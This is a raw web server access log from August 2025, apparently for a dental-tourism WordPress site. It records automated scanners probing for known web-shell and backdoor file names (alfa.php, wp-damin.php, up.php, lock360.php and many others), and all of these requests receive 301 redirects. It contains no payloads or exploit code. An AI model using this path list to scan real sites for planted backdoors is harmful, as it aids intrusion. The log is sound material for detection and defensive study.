"-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:56 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 250 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:56 -0400] "GET /wp-content/themes/wp-2019.php HTTP/1.1" 301 260 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:56 -0400] "GET /wp-includes/ID3/02.php HTTP/1.1" 301 253 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:57 -0400] "GET /wp-includes/fonts/inputs.php HTTP/1.1" 301 259 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:57 -0400] "GET /wp-includes/widgets/alfa.php HTTP/1.1" 301 259 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:58 -0400] "GET /wp-includes/style-engine/13.php HTTP/1.1" 301 262 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:58 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/xp.php HTTP/1.1" 301 279 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:58 -0400] "GET /wp-content/uploads/2024/item.php HTTP/1.1" 301 263 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:59 -0400] "GET /js/about.php HTTP/1.1" 301 243 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:10:59 -0400] "GET /wp-includes/block-patterns/gecko-litespeed.php HTTP/1.1" 301 277 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:00 -0400] "GET /wp-content/wp-damin.php HTTP/1.1" 301 254 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:00 -0400] "GET /wp-includes/images/wlw/setup-config.php HTTP/1.1" 301 270 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:01 -0400] "GET /uploads/mail.php HTTP/1.1" 301 247 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:01 -0400] "GET /wp-includes/js/hehe.php HTTP/1.1" 301 254 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:02 -0400] "GET /wp-includes/sodium_compat/wp-damin.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:02 -0400] "GET /wp-mail.php/wp-includes/ID3/up.php HTTP/1.1" 301 265 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:02 -0400] "GET /wp-includes/style-engine/file.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:03 -0400] "GET /wp-includes/js/mpvloi.php HTTP/1.1" 301 256 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:03 -0400] "GET /wp-includes/images/smilies/wp-2019.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:04 -0400] "GET /wp-admin/user/up HTTP/1.1" 301 247 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:04 -0400] "GET /wp-includes/html-api/link.php HTTP/1.1" 301 260 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:05 -0400] "GET /wp-content/themes/aahana/up.php HTTP/1.1" 301 262 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:05 -0400] "GET /function/test.php HTTP/1.1" 301 248 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:05 -0400] "GET /wp-content/themes/seotheme/xp.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:06 -0400] "GET /wp-admin/css/colors/blue/setup-config.php HTTP/1.1" 301 272 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:06 -0400] "GET /wp-content/themes/simple.php HTTP/1.1" 301 259 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:07 -0400] "GET /wp-includes/Text/Diff/Engine/test.php HTTP/1.1" 301 268 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:07 -0400] "GET /wp-includes/Text/Diff/Engine/readme.php HTTP/1.1" 301 270 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:08 -0400] "GET /wp-includes/images/smilies/bless.php HTTP/1.1" 301 267 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:08 -0400] "GET /wp-includes/images/wlw/fm.php HTTP/1.1" 301 260 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:09 -0400] "GET /wp-includes/widgets/goat1.php HTTP/1.1" 301 260 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:09 -0400] "GET /wp-includes/fonts/makeasmtp.php HTTP/1.1" 301 262 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:09 -0400] "GET /wp-includes/blocks/wp-damin.php HTTP/1.1" 301 262 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:10 -0400] "GET /wp-admin/js/widgets/system_log.php HTTP/1.1" 301 265 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:10 -0400] "GET /wp-includes/images/smilies/go.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:11 -0400] "GET /wp-content/plugins/hellopress/setup-config.php HTTP/1.1" 301 277 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:11 -0400] "GET /.well-known/acme-challenge/admin.php HTTP/1.1" 301 267 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:12 -0400] "GET /cgi-bin/cgi-bin/about.php HTTP/1.1" 301 256 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:13 -0400] "GET /cgi-bin/lock360.php HTTP/1.1" 301 250 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:13 -0400] "GET /wp-admin/css/colors/coffee/getid3s.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:13 -0400] "GET /wp-admin/buy.php HTTP/1.1" 301 247 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:14 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 251 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:14 -0400] "GET /wp-admin/css/colors/coffee/as.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:15 -0400] "GET /cgi-bin/cgi-bin/install.php HTTP/1.1" 301 258 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:15 -0400] "GET /wp-includes/block-patterns/alfa.php HTTP/1.1" 301 266 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:16 -0400] "GET /wp-includes/pomo/02.php HTTP/1.1" 301 254 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:16 -0400] "GET /wp-admin/css/colors/coffee/link.php HTTP/1.1" 301 266 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:17 -0400] "GET /wp-includes/php-compat/webadmin.php HTTP/1.1" 301 266 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:17 -0400] "GET /wp-includes/pomo/file.php HTTP/1.1" 301 256 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:18 -0400] "GET /wp-content/themes/aahana/cc.php HTTP/1.1" 301 262 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:19 -0400] "GET /wp-includes/Text/Diff/Engine/class.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:19 -0400] "GET /wp-content/uploads/2024/wp-configs.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:20 -0400] "GET /wp-includes/js/codemirror/admin.php HTTP/1.1" 301 266 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:20 -0400] "GET /wp-includes/assets/wp-trackback.php HTTP/1.1" 301 266 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:21 -0400] "GET /wp-admin/css/colors/coffee/jp.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:21 -0400] "GET /wp-includes/rest-api/endpoints/wp-mail.php HTTP/1.1" 301 273 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:21 -0400] "GET /.well-known/acme-challenge/link.php HTTP/1.1" 301 266 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:22 -0400] "GET /wp-includes/rest-api/endpoints/wp.php HTTP/1.1" 301 268 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:22 -0400] "GET /wp-includes/assets/02.php HTTP/1.1" 301 256 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:23 -0400] "GET /wp-content/plugins/linkpreview/media.php.INFECTED.php HTTP/1.1" 301 284 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:23 -0400] "GET /wp-includes/ID3/link.php HTTP/1.1" 301 255 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:24 -0400] "GET /wp-includes/images/smilies/wp-mail.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:24 -0400] "GET /js/wp-2019.php HTTP/1.1" 301 245 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:24 -0400] "GET /wp-includes/block-patterns/ty.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:25 -0400] "GET /wp-admin/wp-configs.php HTTP/1.1" 301 254 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:25 -0400] "GET /wp-includes/Text/Diff/Engine/defaults.php HTTP/1.1" 301 272 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:26 -0400] "GET /wp-includes/block-supports/network.php HTTP/1.1" 301 269 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:26 -0400] "GET /wp-content/plugins/wp-help/goat1.php HTTP/1.1" 301 267 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:27 -0400] "GET /.well-known/getid3s.php HTTP/1.1" 301 254 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:27 -0400] "GET /wp-content/themes/seotheme/13.php HTTP/1.1" 301 264 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:27 -0400] "GET /js/rk2.php HTTP/1.1" 301 241 "-" "-" 172.190.142.176 - - [12/Aug/2025:08:11:28 -0400] "GET /wp-content/themes/seotheme/network.php HTTP/1.1" 301 269 "-" "-" 152.42.157.60 - - [12/Aug/2025:08:13:08 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:08:13:08 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:08:13:09 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:08:13:09 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:08:13:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:08:13:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:08:13:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:08:13:56 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:08:14:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:08:14:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:08:14:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:08:14:48 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.83.8 - - [12/Aug/2025:08:15:17 -0400] "GET / HTTP/1.1" 301 231 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [12/Aug/2025:08:15:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:08:15:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:08:15:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:08:15:32 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:08:15:59 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 52.23.225.234 - - [12/Aug/2025:08:21:30 -0400] "GET /wp-includes/rest-api/about.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:08:23:58 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:08:23:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:08:23:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:08:23:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 52.23.225.234 - - [12/Aug/2025:08:27:17 -0400] "GET /repeater.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 86.8.204.43 - - [12/Aug/2025:08:27:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:08:27:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:08:27:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:08:27:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:08:28:20 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:08:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:08:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:08:28:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 167.172.73.113 - - [12/Aug/2025:08:32:44 -0400] "GET /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "-" "Mozilla/5.0" 52.23.225.234 - - [12/Aug/2025:08:32:53 -0400] "GET /wp-admin/js/widgets/about.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 52.23.225.234 - - [12/Aug/2025:08:38:48 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 68.183.245.101 - - [12/Aug/2025:08:41:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:08:41:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:08:41:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:08:41:33 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:08:43:09 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:08:43:09 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:08:43:09 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:08:43:09 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:08:43:17 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:08:43:18 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:08:43:18 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:08:43:18 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 31.13.127.32 - - [12/Aug/2025:08:43:43 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 52.23.225.234 - - [12/Aug/2025:08:44:25 -0400] "GET /wp-admin/css/colors/blue/wp-crons.wp-admin/css/colors/blue/wp-crons.php HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 146.190.11.185 - - [12/Aug/2025:08:47:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:08:47:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:08:47:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:08:47:14 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:08:50:07 -0400] "GET /wp-admin/css/colors/blue/wp-crons.wp-admin/css/colors/blue/wp-crons.php HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:08:55:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:08:55:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:08:55:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:08:55:38 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 52.23.225.234 - - [12/Aug/2025:08:56:13 -0400] "GET /wp-includes/blocks/calendar/updates.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 68.183.245.101 - - [12/Aug/2025:08:57:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:08:57:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:08:57:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:08:57:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 188.166.216.8 - - [12/Aug/2025:08:58:32 -0400] "POST /admin_panel/index.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" 149.102.237.41 - - [12/Aug/2025:08:59:13 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:08:59:13 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:08:59:13 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - 